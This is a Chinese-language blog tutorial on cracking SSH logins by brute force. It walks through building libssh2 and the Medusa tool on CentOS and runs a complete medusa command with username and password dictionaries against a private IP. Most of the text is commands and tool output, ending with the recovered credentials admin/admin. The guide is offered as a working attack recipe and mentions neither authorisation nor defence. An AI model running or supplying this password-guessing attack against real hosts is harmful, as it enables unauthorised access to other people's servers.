1. 软件 OS::CentOS release 5.2 (Final) (可通过cat /etc/issue查看) 库:libssh2-1.2.7.tar.gz http://www.libssh2.org/download/libssh2-1.2.6.tar.gz medusa:medusa-2.0.tar.gz wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 或者curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 2. 安装libssh2-1.2.7 将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下,解压为libssh2-1.2.7并进入该目录: 2.1 ./configure 2.2 make 2.3 make install 3. 安装medusa-2.0 将medusa-2.0.tar.gz拷贝到/tmp/目录下,解压为medusa-2.0并进入该目录: 2.1 ./configure –build=”i686-pc-linux” –enable-moduel-ssh=yes 2.2 make 2.3 make install 4. 设置环境变量LD_LIBRARY_PATH便于用medusa破解SSH时找到相应的相应的共享库 export LD_LIBRARY_PATH=/usr/local/lib NOTE:若在运行时出现如下类似错误时,一般用上述方法可解决 IMPORTANT: Couldn’t load “ssh” [libssh2.so.1: cannot open shared object file: No such file or directory]. 5. 开始破解SSH 将字典(如brute.dic, p.dic)拷贝到目录/tmp/后,进入/tmp/目录,键入medusa可以看到其它帮助信息,根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126) [root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networksjmk@foofus.net ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete) ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete) ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete) ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete) ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete) ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete) ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete) ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete) 当发现有”ACCOUNT FOUND”时,说明成功破解,在上述例子中我们的成功破解的用户名为admin,密码为admin. |
Linux远程ssh破解
最新推荐文章于 2024-07-19 15:41:30 发布